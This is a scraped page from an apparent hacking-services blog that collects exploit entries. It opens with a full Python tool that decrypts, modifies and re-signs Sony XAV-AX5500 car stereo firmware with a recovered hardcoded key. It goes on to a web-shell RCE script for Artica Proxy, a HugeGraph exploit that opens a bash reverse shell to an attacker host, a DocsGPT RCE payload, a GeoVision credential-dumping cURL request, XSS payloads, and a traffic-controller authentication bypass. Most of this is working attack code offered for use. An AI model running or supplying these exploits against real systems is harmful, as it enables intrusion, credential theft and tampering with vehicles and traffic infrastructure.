# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922
# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device.
# Was ZDI-CAN-22939
# ====
# # Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.
# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested
# to work on most firmware versions prior to v2.00.
# # Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? if they are, how trivial is it to bypass?
# # Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
# # The Unit
# ## Processors
# - DAC
# - System Management Controller (SMC)
# - Applications Processor
# - Display Processor
# Coming from a mobile and desktop computer environment, one may be use to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.
# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.
# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.
# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
# discussed in this report.
# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
# - SHDS1132.up6
# - SHMC1132.u88
# - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
#
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
# ...
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 00778000
#
# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.
# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
# us a strong indication the encryption function is operating in an ECB-style configuration,
# giving us an avenue, even if we do not recover the key, to potentially make modifications
# to the firmware depending on how the checksum is being calculated.
# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
# padding zeros to get us to a 16 byte key
# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.
# # Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.
# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)
# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir
import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
# Filenames as found in the .FIR
MAIN_BINARY_NAME="main_16.bin"
MAIN_RAR_NAME="main_16.rar"
DECRYPTED_FILE_NAME="decrypt.bin"
ENCRYPTED_FILE_NAME="encrypt.bin"
# Offsets in the .FIR
HEADER_LENGTH=0x80
RECOVERY_OFFSET=0x2800
MAIN_OFFSET=0x80000
CHECKSUM_OFFSET=0x800000-0x10
CHECKSUM_SIZE=0x4
RAR_LENGTH_OFFSET=0x4
RAR_LENGTH_SIZE=0x4
# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'
def decrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
decryptor = cipher.decryptor()
with open(input_file, 'rb') as file:
ciphertext = file.read()
# Strip the unencrypted header
ciphertext = ciphertext[HEADER_LENGTH:]
decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
with open(output_file, 'wb') as file:
file.write(decrypted_data)
def aes_encrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
encryptor = cipher.encryptor()
with open(input_file, 'rb') as file:
plaintext = file.read()
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
with open(output_file, 'wb') as file:
file.write(ciphertext)
def get_sony_32(data):
csum = int()
for i in data:
csum = csum + i
return csum % 2147483648 # 2^31
def validate_args(winrar_path, source_file, destination_file):
# Check if the WinRAR executable exists and is a file
if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
sys.exit(1)
# Check if the source file exists
if not os.path.isfile(source_file):
print(f"[x] Error: The specified source file '{source_file}' does not exist.")
sys.exit(1)
# Read 8 bytes from offset 0x10 in the source file
try:
with open(source_file, 'rb') as f:
f.seek(0x10)
signature = f.read(8)
if signature != b'KRSELECO':
print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
sys.exit(1)
except Exception as e:
print(f"[x] Error: Failed to read from '{source_file}': {e}")
sys.exit(1)
# Check if the destination file already exists
if os.path.exists(destination_file):
print(f"[x] Error: The destination file '{destination_file}' already exists.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
parser.add_argument("source_file", help="Path to original .FIR file")
parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
args = parser.parse_args()
validate_args(args.winrar_path, args.source_file, args.destination_file)
RAR_2_PATH = args.winrar_path
GOOD_FIRMWARE_FILE = args.source_file
DESTINATION_FIRMWARE_FILE = args.destination_file
# make temporary directory
workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")
# copy the good firmware file into the temp directory
temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)
print("[+] Cutting the head off and decrypting the contents")
decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)
print("[+] Dump out the rar file")
with open(decrypted_file_path, 'rb') as file:
# right before the rar file there is a 4 byte length header for the rar file. get that.
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
rar_file_bytes = file.read(original_rar_length)
# now dump that out
rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
with open(rar_file_path, 'wb') as rarfile:
rarfile.write(rar_file_bytes)
# check that the stat of the file matches what the header told us
dumped_rar_size = os.stat(rar_file_path).st_size
if dumped_rar_size != original_rar_length:
print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)
print("[+] Extracting the main binary from the rar file")
os.system("unrar x " + rar_file_path + " " + workdir)
print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
input()
print("[+] Continuing")
print("[+] Putting your main binary back into the rar file")
os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)
# we could fix this by writing some FFs
new_rar_size=os.stat(rar_file_path).st_size
if dumped_rar_size > os.stat(rar_file_path).st_size:
print("[!!] The rar size is smaller than the old one. This might cause a problem.")
print("[!!] Push any key to continue, ctrl+c to abort")
input()
with open(decrypted_file_path, 'r+b') as file:
# right before the rar file there is a 4 byte length header for the rar file. go back there
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
# overwrite the old size with the new size
file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))
print("[+] Deleting the old rar from the main container")
# delete the old rar from the main container by FFing it up
file.write(b'\xFF'*original_rar_length)
# seek back to the start
file.seek(MAIN_OFFSET)
print("[+] Loading the new rar back into the main container")
with open(rar_file_path, 'rb') as rarfile:
new_rarfile_bytes = rarfile.read()
file.write(new_rarfile_bytes)
print("[+] Updating Checksum")
with open(decrypted_file_path, 'rb') as file:
contents = file.read()
contents = contents[:-0x0010]
s32_sum = get_sony_32(contents)
with open(decrypted_file_path, 'r+b') as file:
file.seek(CHECKSUM_OFFSET)
# read out the current checksum
old_checksum_bytes=file.read(CHECKSUM_SIZE)
print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
# go back and update it with new checksum
print("new checksum:", s32_sum, hex(s32_sum))
new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
file.seek(CHECKSUM_OFFSET)
file.write(new_checksum_bytes)
print("[+] Encrypting the main container back up")
encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
aes_encrypt_file(decrypted_file_path, encrypted_file_path)
print("[+] Reattaching the main container to the header and writing to dest")
with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
with open(temp_fir_file, 'rb') as firfile:
header = firfile.read(HEADER_LENGTH)
file.write(header)
with open(encrypted_file_path, 'rb') as encfile:
enc_contents = encfile.read()
file.write(enc_contents)
print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
input()
shutil.rmtree(workdir)
if __name__ == "__main__":
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863102307
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps
# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.
# PoC (Proof of Concept):
# ------------------------------------
/*
* Exploit for CVE-2020-7656 and CVE-2019-11358
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
*/
COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);
// 2. Function to execute after jQuery is loaded
script.onload = function() {
console.log("[+] Vulnerable jQuery loaded!");
// 3. Inject malicious content for XSS (CVE-2020-7656)
const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
$('body').append(maliciousContent);
console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
// 4. Exploit Prototype Pollution (CVE-2019-11358)
const defaultConfig = {
"backLink": "<a href='https://example.com'>Go Back</a>"
};
const maliciousParams = {
"__proto__": {
"backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
}
};
// 5. Merge objects using vulnerable $.extend
let config = $.extend(true, defaultConfig, maliciousParams);
console.log("[+] Prototype Pollution executed via $.extend().");
// 6. Create a container to inject malicious content
const container = document.createElement('div');
container.id = 'backLinkContainer';
document.body.appendChild(container);
// 7. Inject malicious content into the DOM
$('#backLinkContainer').html(config.backLink);
console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};
// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902
Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1]=="/":
ACTUAL_URL = URL[:-1]
else:
ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL
def check(ARTICA_URL):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
except Exception as e:
print(Fore.RED+"Could not reach, check URL")
if check.status_code==200:
print(Fore.GREEN+"Vulnerable")
return True
else:
print(Fore.RED+"Not Vulnerable")
def exploit(ARTICA_URL):
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
payload_data = {
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
"cache_serializer": "json",
"cache_size": 999999999,
"cache_data": {
payload: {
"cache_date": 0,
"ttl": 999999999
}
}
}
}
while True:
PAYLOAD_CMD = input("enter command: ")
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if response.status_code == 200:
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
cmd_response = requests.get(cmd_url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print(cmd_response.text)
else:
print("Failed to execute the payload")
check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
exploit(ARTICA_URL=ARTICA_URL)
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
print(f"[+] Status Code: {response.status_code}")
print("[+] Response Body:")
print(response.text)
except Exception as e:
print(f"[-] Error sending request: {e}")
# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024–27348
from requests import Request, Session
import sys
import json
def title():
print('''
______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
''')
def exploit(url, lhost, lport):
payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
headers = {
'Content-Type': 'application/json'}
s = Session()
url = url + "/gremlin"
req = Request('POST', url, json=payload, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15)
print(prepped.headers)
print(url)
print(resp.headers)
print(payload)
print(resp.status_code)
print(resp.text)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link:
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field
immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
Privilege Vulnerability
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/ad-manager/
# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
# Version: ADManager Plus Build < 7210
# Tested against: Build 7203
# CVE: CVE-2024-24409
# Description
The Modify Computers is a predefined role in ADManager for managing
computers. If a technician user has the Modify Computers privilege
over a computer can change the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer object. In this
way, the technician user can set Constrained Kerberos Delegation over
any computer within the Organizational Unit that the user was
delegated.
Contrary to what ADManager claims the user who has the Modify
Computers role can change the privilege of computer objects in the
Active Directory. The Constrained Kerberos Delegation can be set for
any service such as CIFS, LDAP, HOST services. Then the user can
access these services by abusing the Constrained Kerberos Delegation.
In addition, the Unconstrained Kerberos Delegation can be set over the
computer objects by changing the userAccountControl attribute.
Normally, only users that have SeEnableDelegationPrivilege privilege
can set constrained kerberos delegation. Only members of the
BUILTIN\Administrators group have this privilege by default. The
delegated user for an Organizational Unit can not set constrained
kerberos delegation even if a user has the GenericAll right over a
computer account, so the delegation process in Active Directory does
not grant this privilege. However, the technician user can use the
SeEnableDelegationPrivilege right via the Modify Computers role.
# Vulnerability reasons
1. ADMP Web App Authorization issue: Assigning a predefined Modify
Computers role delegates the technician user to modify custom
attributes of computers unexpectedly. Even though it appears that this
privilege is not granted in the UI, the Additional Custom Attribute
property is assigned and this leads to broken access control
vulnerability.
2. There is no restriction for editing the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
application performs changes with domain admin privileges as designed
so that if we can bypass some restrictions (e.g. format of attribute
value), our requests are applied with domain admin privileges. This
way we can edit the attributes userAccountControl and
msDS-AllowedToDelegateTo.
# Impact
A technician user elevates privileges from Domain User to Domain
Admin. For example, the user can set Constrained Kerberos Delegation
over CLIENT1$ for the CIFS service of the domain controller and access
the CIFS service. As a result, the user is delegated to manage
CLIENT1$ but he can access the CIFS service of the domain controller
impersonating a user unexpectedly.
# Proof Of Concept
https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
# Exploit Title: Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 07/09/2024
# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
# Vendor Homepage: https://www.q-free.com
# Software Link: N/A
# Version: 1.9
# Tested on: (Intelight x-1) Linux 3.14.57
# CVE : CVE-2024-38944
## Vulnerability Description
This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
Authentication is not required to exploit this vulnerability.
The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
The issue results from the lack of authentication prior to allowing access to functionality.
An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
## Steps to Reproduce
Navigate to the IP address of an identified controller
When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.
# Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
# Date: 8-7-2024
# Category: Web Application
# Exploit Author: Jeremia Geraldi Sihombing
# Version: 2.10.1
# Tested on: Windows
# CVE: CVE-2024-39143
Description:
----------------
A stored cross-site scripting (XSS) vulnerability exists in
ResidenceCMS 2.10.1 that allows a low-privilege user to create
malicious property content with HTML inside it, which acts as a
stored XSS payload. If this property page is visited by anyone
including the administrator, then the XSS payload will be triggered..
Steps to reproduce
-------------------------
1. Login as a low privilege user with property edit capability.
2. Create or Edit one of the user owned property
(We can user the default property owned by the user).
3. Fill the content form with XSS payload using the Code View feature.
Before saving it make sure to go back using the usual view to see if the HTML
is rendered or not.
Vulnerable parameter name: property[property_description][content]
Example Payload: <img src="x" onerror="alert(document.cookie)">
4. After saving the new property content and clicking the 'Finish Editing',
go to the page and see the XSS is triggered.
It is possible to trigger the XSS by using any account or even
unauthorized account.
Burp Request
-------------------
POST /en/user/property/7/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/en/user/property/7/edit
